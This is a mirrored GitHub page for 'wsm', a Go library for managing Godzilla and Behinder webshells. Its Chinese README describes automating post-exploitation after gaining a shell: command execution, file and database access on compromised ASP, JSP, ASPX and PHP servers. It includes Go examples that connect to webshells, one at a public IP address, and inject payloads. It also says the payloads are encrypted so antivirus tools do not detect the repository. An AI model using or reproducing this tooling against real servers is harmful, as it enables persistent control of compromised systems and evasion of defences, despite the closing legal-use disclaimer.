https://github.com/xiecat/wsm
webshell manager libraries | 网站管理工具
https://github.com/xiecat/wsm
behinder godzilla webshell website-management
Last synced: 11 months ago
JSON representation
webshell manager libraries | 网站管理工具
- Host: GitHub
- URL: https://github.com/xiecat/wsm
- Owner: xiecat
- Created: 2022-06-21T09:24:32.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-07-23T04:01:03.000Z (over 3 years ago)
- Last Synced: 2025-03-30T00:31:36.366Z (12 months ago)
- Topics: behinder, godzilla, webshell, website-management
- Language: Go
- Homepage:
- Size: 8.45 MB
- Stars: 124
- Watchers: 5
- Forks: 13
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# wsm
有时候不希望 PoC/Exp 止步于 getshell,还想着自动化进行某些操作,因此有了这个库。通过 wsm 直接管理您的哥斯拉和冰蝎 webshell
## 功能列表
#### 哥斯拉
| 脚本类型 | 支持的加密类型 | 功能支持 |
| --------- | ----------------- | ---------------------------------------------- |
| asp | XOR_BS6、XOR_RAW | 存活验证、基本信息、命令执行、文件、数据库操作 |
| jsp、jspx | AES_BS64、AES_RAW | 存活验证、基本信息、命令执行、文件、数据库操作 |
| aspx | AES_BS64、AES_RAW | 存活验证、基本信息、命令执行、文件、数据库操作 |
| php | XOR_BS6、XOR_RAW | 存活验证、基本信息、命令执行、文件、数据库操作 |
#### 冰蝎
| 脚本类型 | 支持的加密类型 | 功能支持 |
| --------- | -------------- | ---------------------------------------------- |
| asp | XOR | 存活验证、基本信息、命令执行、文件、数据库操作 |
| jsp、jspx | AES | 存活验证、基本信息、命令执行、文件、数据库操作 |
| aspx | AES | 存活验证、基本信息、命令执行、文件、数据库操作 |
| php | XOR、AES | 存活验证、基本信息、命令执行、文件、数据库操作 |
## 例子
##### 冰蝎
```go
package main
import (
"fmt"
"github.com/xiecat/wsm"
"github.com/xiecat/wsm/lib/shell"
"github.com/xiecat/wsm/lib/shell/behinder"
"log"
)
func main() {
info := &wsm.BehinderInfo{
BaseShell: wsm.BaseShell{
Url: "http://127.0.0.1:8080/bx.jsp",
Password: "rebeyond",
Script: shell.JavaScript,
Proxy: "http://127.0.0.1:9999",
Headers: nil,
}}
bx, err := wsm.NewBehinder(info)
if err != nil {
log.Println(err)
}
// 验证存活
i, err := bx.Ping()
if err != nil {
log.Println(err)
}
fmt.Println(i)
}
```
##### 哥斯拉
```go
package main
import (
"fmt"
"github.com/xiecat/wsm"
"github.com/xiecat/wsm/lib/charset"
"github.com/xiecat/wsm/lib/shell"
"github.com/xiecat/wsm/lib/shell/godzilla"
"log"
)
func main() {
info := &wsm.GodzillaInfo{
BaseShell: wsm.BaseShell{
Url: "http://139.196.175.86:8080/bs64.jsp",
Password: "pass",
Script: shell.JavaScript,
Proxy: "http://127.0.0.1:9999",
},
Key: "key",
Crypto: godzilla.JAVA_AES_BASE64,
Encoding: charset.UTF8CharSet,
}
g, err := wsm.NewGodzillaInfo(info)
if err != nil {
log.Println(err)
}
// 注入全部的 payload
err = g.InjectPayload()
if err != nil {
log.Println(err)
}
isAlive, err := g.Ping()
if err != nil {
log.Println(err)
}
fmt.Println(isAlive)
}
```
更多例子可以查看 [**examples**](https://github.com/xiecat/wsm/tree/main/examples)
## 流量解密
支持流量解密
[**examples**](https://github.com/xiecat/wsm/tree/main/examples/decrypt_packets)
## 说明
*[payloads](https://github.com/xiecat/wsm/tree/main/lib/payloads) 通过静态资源的方式使用,同时对原始的 payload文件进行了 gzip 压缩后再 aes 加密,这样做是为了拉取该库时,不被杀软报毒*
## 感谢
[Behinder](https://github.com/rebeyond/Behinder)
[Godzilla](https://github.com/BeichenDream/Godzilla)
[As-Exploits](https://github.com/yzddmr6/As-Exploits)
[每篇文章](https://yzddmr6.com/)
## 注意事项
本库仅供合法的渗透测试以及爱好者参考学习,请勿用于非法用途,否则自行承担相关责任。